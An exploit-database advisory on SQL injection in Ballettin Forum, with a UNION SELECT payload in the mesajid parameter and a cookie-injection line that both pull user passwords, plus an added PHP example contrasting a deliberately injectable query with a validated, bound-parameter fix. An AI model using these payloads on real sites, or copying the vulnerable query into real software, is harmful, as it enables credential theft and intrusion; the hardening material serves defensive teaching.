Ballettin Forum – SQL Injection

  • Author: 3v0
    Date: 2010-07-25
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/14470/
  • ====================================================================
    # Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability
    # Date: 25/07/2010
    # Author: 3v0 aka evolution <evolution ^ darkedition.com>
    # Software Link: http://www.ballettin.com
    # Tested on: Windows Xp Pack 3
    ====================================================================
    #1 - Vulnerable File
    ------------------------------------------------------
    [+] File: http://www.site.com/alinti.php?mesajid=[SQL]
    [+] Exploit: http://www.site.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1
    
    #2 - Insecure Cookie
    ------------------------------------------------------
    javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1";
    Then go to http://www.site.com/ust.php
    ====================================================================
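
Both findings come down to a client-supplied value (the `mesajid` parameter, the `ballettin` cookie) reaching a SQL statement as text. The following is an added example, not Ballettin's source code: it models the concatenation pattern the advisory implies next to a hardened lookup. The `mesajlar` table, its `metin` column, the function names and the in-memory SQLite database are assumptions; only `uyeler`, `id` and `sifre` appear in the advisory.

```php
<?php
// Added illustration, not Ballettin's source. Constructed schema: only the
// table `uyeler` and its columns `id` and `sifre` are named in the advisory.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE uyeler (id INTEGER PRIMARY KEY, sifre TEXT)');
$db->exec('CREATE TABLE mesajlar (id INTEGER PRIMARY KEY, metin TEXT)'); // hypothetical
$db->exec("INSERT INTO uyeler VALUES (1, 'constructed-hash')");
$db->exec("INSERT INTO mesajlar VALUES (6, 'constructed message')");

// Before: the request value is concatenated into the statement, so any SQL
// it carries (such as a UNION) is executed as part of the query.
function quote_vulnerable(PDO $db, string $mesajid): array {
    $sql = 'SELECT metin FROM mesajlar WHERE id=' . $mesajid;
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// After, step 1: accept only a positive integer; everything else is rejected.
function parse_id(?string $raw): ?int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// After, step 2: bind the validated value so it can never be parsed as SQL.
function quote_hardened(PDO $db, ?string $raw): array {
    $id = parse_id($raw);
    if ($id === null) {
        return []; // a real handler would answer with HTTP 400 here
    }
    $st = $db->prepare('SELECT metin FROM mesajlar WHERE id = :id');
    $st->bindValue(':id', $id, PDO::PARAM_INT);
    $st->execute();
    return $st->fetchAll(PDO::FETCH_COLUMN);
}

// The mesajid value from the advisory, with '+' decoded to spaces.
$fromAdvisory = '-6666 UNION SELECT sifre FROM uyeler WHERE id=1';
var_dump(quote_vulnerable($db, $fromAdvisory)); // row comes from uyeler
var_dump(quote_hardened($db, $fromAdvisory));   // rejected before any query
var_dump(quote_hardened($db, '6'));             // legitimate lookup still works
```

The same `parse_id` plus bound-parameter treatment applies to the `ballettin` cookie, but a well-formed integer in that cookie is still chosen by the client, so the user's identity should be read from server-side session state rather than from the cookie value.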